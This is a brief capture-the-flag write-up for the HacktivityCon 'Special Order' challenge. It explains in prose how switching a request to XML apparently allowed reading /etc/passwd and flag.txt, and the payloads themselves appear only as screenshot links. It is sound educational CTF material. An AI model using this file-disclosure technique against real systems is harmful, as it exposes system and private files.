CTFtime.org / HacktivityCon CTF / Special Order / Writeup

## Writeup Special Order by Ambrotd
Looking around the website and with the second order hint from the second order ecuation, the only place I find I could do something was in customize

This was the request:

![4c77161d1306129ba6bd5948acfb6d2a.png](_resources/ddc4c3ccf81f4383ba52da1fbbac8a06.png)

Convert it to xml seems to work

![b8a92220f58dd89a0254dd2f0fbbdec7.png](_resources/663fcb1135c544e587bae2fef75193f7.png)

And the result was saved in:

![031faa13595eb86ff95db449e842cc54.png](_resources/35bcafae6be64ecdbb62549bcbd9cf97.png)

So I tried to pull the /etc/passwd

![e0b8c387b26dc3158937ba021ad89b8d.png](_resources/2c886ac6c2074d71b0b06b21b4afbcc9.png)

And the response was on the css file clean-blog.css

![808ca6e0f8cbddf2418dffac3c48d7c3.png](_resources/a104424575cc4a7284cdadad42f6da23.png)

So I tried with the flag.txt

![1779fc44a47429a6f2472e80b6d681f7.png](_resources/aecf95e371e548db94c0904a8083c1ed.png)

And I got the flag:

![a4688b647cfbb660bce1cbf00cab84d8.png](_resources/a5c352dd4be04dee987c48731c268085.png)

Original writeup (https://github.com/Ambrotd/hacktivitycon/blob/master/Special%20Order/Special%20Order.md).

Special Order

Comments

Sign in with